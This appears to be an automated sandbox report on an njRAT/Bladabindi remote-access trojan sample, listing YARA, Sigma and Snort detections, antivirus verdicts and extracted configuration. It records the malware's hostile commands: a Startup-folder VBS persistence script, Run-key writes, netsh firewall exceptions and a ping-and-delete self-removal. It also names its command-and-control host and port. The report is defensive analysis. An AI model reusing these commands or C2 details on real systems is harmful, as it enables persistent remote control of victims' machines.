3.1.nOZ2Oqnzbz.exe.400000.0.unpack	MALWARE_Win_NjRAT	Detects NjRAT / Bladabindi	ditekSHen	0x6c0c:$s1: netsh firewall delete allowedprogram 0x6b64:$s2: netsh firewall add allowedprogram 0x6c6c:$s3: 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 20 00 2F 00 63 00 20 00 70 00 69 00 6E 00 67 0x6920:$s4: Execute ERROR 0x6980:$s4: Execute ERROR 0x6944:$s5: Download ERROR 0x6caa:$s6: [kl]
4.2.WindowsServices.exe.2030000.1.raw.unpack	CN_disclosed_20180208_c	Detects malware from disclosed CN malware set	Florian Roth	0x6c6c:$x1: cmd.exe /c ping 0 -n 2 & del " 0x683e:$s1: winmgmts:\\.\root\SecurityCenter2 0x6966:$s3: Executed As 0x5fb3:$s5: Stub.exe 0x6944:$s6: Download ERROR 0x6800:$s8: Select * From AntiVirusProduct
4.2.WindowsServices.exe.2030000.1.raw.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x6b64:$a1: netsh firewall add allowedprogram 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6cf4:$b1: [TAP] 0x6c6c:$c3: cmd.exe /c ping
4.2.WindowsServices.exe.2030000.1.raw.unpack	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x6b34:$reg: SEE_MASK_NOZONECHECKS 0x6920:$msg: Execute ERROR 0x6980:$msg: Execute ERROR 0x6c6c:$ping: cmd.exe /c ping 0 -n 2 & del
4.2.WindowsServices.exe.2030000.1.raw.unpack	MALWARE_Win_NjRAT	Detects NjRAT / Bladabindi	ditekSHen	0x6c0c:$s1: netsh firewall delete allowedprogram 0x6b64:$s2: netsh firewall add allowedprogram 0x6c6c:$s3: 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 20 00 2F 00 63 00 20 00 70 00 69 00 6E 00 67 0x6920:$s4: Execute ERROR 0x6980:$s4: Execute ERROR 0x6944:$s5: Download ERROR 0x6caa:$s6: [kl]
9.2.WindowsServices.exe.710000.1.raw.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
9.2.WindowsServices.exe.710000.1.raw.unpack	Windows_Trojan_Njrat_30f3c220	unknown	unknown	0x5767:$a1: get_Registry 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6944:$a3: Download ERROR 0x6c6c:$a4: cmd.exe /c ping 0 -n 2 & del " 0x6c0c:$a5: netsh firewall delete allowedprogram "
9.2.WindowsServices.exe.710000.1.raw.unpack	CN_disclosed_20180208_c	Detects malware from disclosed CN malware set	Florian Roth	0x6c6c:$x1: cmd.exe /c ping 0 -n 2 & del " 0x683e:$s1: winmgmts:\\.\root\SecurityCenter2 0x6966:$s3: Executed As 0x5fb3:$s5: Stub.exe 0x6944:$s6: Download ERROR 0x6800:$s8: Select * From AntiVirusProduct
9.2.WindowsServices.exe.710000.1.raw.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x6b64:$a1: netsh firewall add allowedprogram 0x6b34:$a2: SEE_MASK_NOZONECHECKS 0x6cf4:$b1: [TAP] 0x6c6c:$c3: cmd.exe /c ping
9.2.WindowsServices.exe.710000.1.raw.unpack	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x6b34:$reg: SEE_MASK_NOZONECHECKS 0x6920:$msg: Execute ERROR 0x6980:$msg: Execute ERROR 0x6c6c:$ping: cmd.exe /c ping 0 -n 2 & del
9.2.WindowsServices.exe.710000.1.raw.unpack	MALWARE_Win_NjRAT	Detects NjRAT / Bladabindi	ditekSHen	0x6c0c:$s1: netsh firewall delete allowedprogram 0x6b64:$s2: netsh firewall add allowedprogram 0x6c6c:$s3: 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 20 00 2F 00 63 00 20 00 70 00 69 00 6E 00 67 0x6920:$s4: Execute ERROR 0x6980:$s4: Execute ERROR 0x6944:$s5: Download ERROR 0x6caa:$s6: [kl]
Click to see the 85 entries

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" .., EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\WindowsServices.exe, ProcessId: 1896, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bf497657d005804b657fde8dd2d0cb46

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs" , ProcessId: 7092, ProcessName: wscript.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" .., EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\WindowsServices.exe, ProcessId: 1896, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bf497657d005804b657fde8dd2d0cb46

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\WindowsServices.exe, ProcessId: 1896, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exe

Sigma detected: Suspicious Process Patterns NTDS.DIT Exfil

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\WindowsServices.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\WindowsServices.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\WindowsServices.exe, ParentCommandLine: C:\Users\user\Desktop\nOZ2Oqnzbz.exe, ParentImage: C:\Users\user\Desktop\nOZ2Oqnzbz.exe, ParentProcessId: 6500, ParentProcessName: nOZ2Oqnzbz.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" , ProcessId: 2668, ProcessName: WindowsServices.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs" , ProcessId: 7092, ProcessName: wscript.exe

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" .., EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\WindowsServices.exe, ProcessId: 1896, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\bf497657d005804b657fde8dd2d0cb46

Sigma detected: Wscript Shell Run In CommandLine

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\Desktop\nOZ2Oqnzbz.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs", CommandLine: C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\Desktop\nOZ2Oqnzbz.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\Desktop\nOZ2Oqnzbz.exe, ParentImage: C:\Users\user\Desktop\nOZ2Oqnzbz.exe, ParentProcessId: 7116, ParentProcessName: nOZ2Oqnzbz.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\Desktop\nOZ2Oqnzbz.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs", ProcessId: 6248, ProcessName: cmd.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 6248, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs

Snort Signatures

ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) - Source IP: 192.168.2.4 - Destination IP: 3.6.98.232

Timestamp:	192.168.2.43.6.98.23249754192082033132 02/08/24-06:54:17.203251
SID:	2033132
Source Port:	49754
Destination Port:	19208
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) - Source IP: 192.168.2.4 - Destination IP: 3.6.98.232

Timestamp:	192.168.2.43.6.98.23249753192082033132 02/08/24-06:53:47.167039
SID:	2033132
Source Port:	49753
Destination Port:	19208
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) - Source IP: 192.168.2.4 - Destination IP: 3.6.115.64

Timestamp:	192.168.2.43.6.115.6449740192082033132 02/08/24-06:52:40.778707
SID:	2033132
Source Port:	49740
Destination Port:	19208
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) - Source IP: 192.168.2.4 - Destination IP: 3.6.115.64

Timestamp:	192.168.2.43.6.115.6449750192082033132 02/08/24-06:53:17.004564
SID:	2033132
Source Port:	49750
Destination Port:	19208
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) - Source IP: 192.168.2.4 - Destination IP: 3.6.115.64

Timestamp:	192.168.2.43.6.115.6449745192082033132 02/08/24-06:52:56.886497
SID:	2033132
Source Port:	49745
Destination Port:	19208
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) - Source IP: 192.168.2.4 - Destination IP: 3.6.115.64

Timestamp:	192.168.2.43.6.115.6449746192082033132 02/08/24-06:53:02.654805
SID:	2033132
Source Port:	49746
Destination Port:	19208
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) - Source IP: 192.168.2.4 - Destination IP: 3.6.115.64

Timestamp:	192.168.2.43.6.115.6449735192082033132 02/08/24-06:52:19.109017
SID:	2033132
Source Port:	49735
Destination Port:	19208
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) - Source IP: 192.168.2.4 - Destination IP: 3.6.115.64

Timestamp:	192.168.2.43.6.115.6449736192082033132 02/08/24-06:52:23.314373
SID:	2033132
Source Port:	49736
Destination Port:	19208
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) - Source IP: 192.168.2.4 - Destination IP: 3.6.115.64

Timestamp:	192.168.2.43.6.115.6449748192082033132 02/08/24-06:53:09.670781
SID:	2033132
Source Port:	49748
Destination Port:	19208
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) - Source IP: 192.168.2.4 - Destination IP: 3.6.115.64

Timestamp:	192.168.2.43.6.115.6449737192082033132 02/08/24-06:52:28.873469
SID:	2033132
Source Port:	49737
Destination Port:	19208
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) - Source IP: 192.168.2.4 - Destination IP: 3.6.115.64

Timestamp:	192.168.2.43.6.115.6449743192082033132 02/08/24-06:52:53.287877
SID:	2033132
Source Port:	49743
Destination Port:	19208
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) - Source IP: 192.168.2.4 - Destination IP: 3.6.115.64

Timestamp:	192.168.2.43.6.115.6449747192082033132 02/08/24-06:53:05.744099
SID:	2033132
Source Port:	49747
Destination Port:	19208
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) - Source IP: 192.168.2.4 - Destination IP: 3.6.115.64

Timestamp:	192.168.2.43.6.115.6449742192082033132 02/08/24-06:52:48.846165
SID:	2033132
Source Port:	49742
Destination Port:	19208
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) - Source IP: 192.168.2.4 - Destination IP: 3.6.115.64

Timestamp:	192.168.2.43.6.115.6449739192082033132 02/08/24-06:52:37.039479
SID:	2033132
Source Port:	49739
Destination Port:	19208
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) - Source IP: 192.168.2.4 - Destination IP: 3.6.98.232

Timestamp:	192.168.2.43.6.98.23249751192082033132 02/08/24-06:53:22.365303
SID:	2033132
Source Port:	49751
Destination Port:	19208
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) - Source IP: 192.168.2.4 - Destination IP: 3.6.115.182

Timestamp:	192.168.2.43.6.115.18249755192082033132 02/08/24-06:54:57.629247
SID:	2033132
Source Port:	49755
Destination Port:	19208
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) - Source IP: 192.168.2.4 - Destination IP: 3.6.98.232

Timestamp:	192.168.2.43.6.98.23249752192082033132 02/08/24-06:53:27.364368
SID:	2033132
Source Port:	49752
Destination Port:	19208
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) - Source IP: 192.168.2.4 - Destination IP: 3.6.115.64

Timestamp:	192.168.2.43.6.115.6449738192082033132 02/08/24-06:52:32.434036
SID:	2033132
Source Port:	49738
Destination Port:	19208
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) - Source IP: 192.168.2.4 - Destination IP: 3.6.115.64

Timestamp:	192.168.2.43.6.115.6449741192082033132 02/08/24-06:52:45.605256
SID:	2033132
Source Port:	49741
Destination Port:	19208
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) - Source IP: 192.168.2.4 - Destination IP: 3.6.115.64

Timestamp:	192.168.2.43.6.115.6449749192082033132 02/08/24-06:53:13.881752
SID:	2033132
Source Port:	49749
Destination Port:	19208
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: nOZ2Oqnzbz.exe

Avira: detected

Antivirus detection for URL or domain

Source: 0.tcp.in.ngrok.io

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exe

Avira: detection malicious, Label: BDS/Poison.mon

Found malware configuration

Source: 12.2.WindowsServices.exe.400000.0.unpack

Malware Configuration Extractor: Njrat {"Campaign ID": "David", "Version": "0.7d", "Install Name": "bf497657d005804b657fde8dd2d0cb46", "Install Dir": "TEMP", "Registry Value": "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Host": "0.tcp.in.ngrok.io", "Port": "19208", "Network Seprator": "Y262SUCZ4UJJ"}

Multi AV Scanner detection for domain / URL

Source: 0.tcp.in.ngrok.io	Virustotal: Detection: 8%			Perma Link
Source: 0.tcp.in.ngrok.io	Virustotal: Detection: 8%			Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exe	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exe	Virustotal: Detection: 86%			Perma Link

Multi AV Scanner detection for submitted file

Source: nOZ2Oqnzbz.exe	ReversingLabs: Detection: 86%
Source: nOZ2Oqnzbz.exe	Virustotal: Detection: 86%			Perma Link

Yara detected Njrat

Source: Yara match	File source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.WindowsServices.exe.710000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.WindowsServices.exe.710000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.WindowsServices.exe.710000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.WindowsServices.exe.2030000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nOZ2Oqnzbz.exe.620000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.WindowsServices.exe.2030000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.WindowsServices.exe.710000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000001.1622653956.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000001.1928333872.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1698435023.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000001.1928333872.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000001.1734806428.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1991883581.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000001.1734806428.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1801120260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1991883581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000001.1705766648.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1801120260.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1698435023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000001.1705766648.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000001.1622653956.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nOZ2Oqnzbz.exe PID: 7116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nOZ2Oqnzbz.exe PID: 6500, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsServices.exe PID: 2668, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsServices.exe PID: 1896, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsServices.exe PID: 3484, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsServices.exe PID: 6516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsServices.exe PID: 1868, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsServices.exe PID: 6400, type: MEMORYSTR

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: nOZ2Oqnzbz.exe

Joe Sandbox ML: detected

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Unpacked PE file: 3.2.nOZ2Oqnzbz.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Unpacked PE file: 12.2.WindowsServices.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Unpacked PE file: 21.2.WindowsServices.exe.400000.0.unpack

Source: nOZ2Oqnzbz.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Jump to behavior

Source:	Binary string: caspol.pdbx source: nOZ2Oqnzbz.exe, 00000000.00000002.1624289078.000000000066B000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000004.00000003.1705907869.0000000000781000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000009.00000002.1738164335.000000000073E000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000012.00000002.1941548771.000000000073E000.00000004.00000020.00020000.00000000.sdmp, nOZ2Oqnzbz.exe.0.dr, WindowsServices.exe.3.dr
Source:	Binary string: caspol.pdb source: nOZ2Oqnzbz.exe, 00000000.00000002.1624289078.000000000066B000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000004.00000003.1705907869.0000000000781000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000009.00000002.1738164335.000000000073E000.00000004.00000020.00020000.00000000.sdmp, WindowsServices.exe, 00000012.00000002.1941548771.000000000073E000.00000004.00000020.00020000.00000000.sdmp, nOZ2Oqnzbz.exe.0.dr, WindowsServices.exe.3.dr

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49735 -> 3.6.115.64:19208
Source: Traffic	Snort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49736 -> 3.6.115.64:19208
Source: Traffic	Snort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49737 -> 3.6.115.64:19208
Source: Traffic	Snort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49738 -> 3.6.115.64:19208
Source: Traffic	Snort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49739 -> 3.6.115.64:19208
Source: Traffic	Snort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49740 -> 3.6.115.64:19208
Source: Traffic	Snort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49741 -> 3.6.115.64:19208
Source: Traffic	Snort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49742 -> 3.6.115.64:19208
Source: Traffic	Snort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49743 -> 3.6.115.64:19208
Source: Traffic	Snort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49745 -> 3.6.115.64:19208
Source: Traffic	Snort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49746 -> 3.6.115.64:19208
Source: Traffic	Snort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49747 -> 3.6.115.64:19208
Source: Traffic	Snort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49748 -> 3.6.115.64:19208
Source: Traffic	Snort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49749 -> 3.6.115.64:19208
Source: Traffic	Snort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49750 -> 3.6.115.64:19208
Source: Traffic	Snort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49751 -> 3.6.98.232:19208
Source: Traffic	Snort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49752 -> 3.6.98.232:19208
Source: Traffic	Snort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49753 -> 3.6.98.232:19208
Source: Traffic	Snort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49754 -> 3.6.98.232:19208
Source: Traffic	Snort IDS: 2033132 ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) 192.168.2.4:49755 -> 3.6.115.182:19208

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 0.tcp.in.ngrok.io

Connects to many ports of the same IP (likely port scanning)

Source: global traffic	TCP traffic: 3.6.115.182 ports 0,1,2,8,9,19208
Source: global traffic	TCP traffic: 3.6.98.232 ports 0,1,2,8,9,19208
Source: global traffic	TCP traffic: 3.6.115.64 ports 0,1,2,8,9,19208

Source: global traffic	TCP traffic: 192.168.2.4:49735 -> 3.6.115.64:19208
Source: global traffic	TCP traffic: 192.168.2.4:49751 -> 3.6.98.232:19208
Source: global traffic	TCP traffic: 192.168.2.4:49755 -> 3.6.115.182:19208

Source: Joe Sandbox View	IP Address: 3.6.115.182 3.6.115.182
Source: Joe Sandbox View	IP Address: 3.6.115.64 3.6.115.64
Source: Joe Sandbox View	IP Address: 3.6.98.232 3.6.98.232

Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: unknown

DNS traffic detected: queries for: 0.tcp.in.ngrok.io

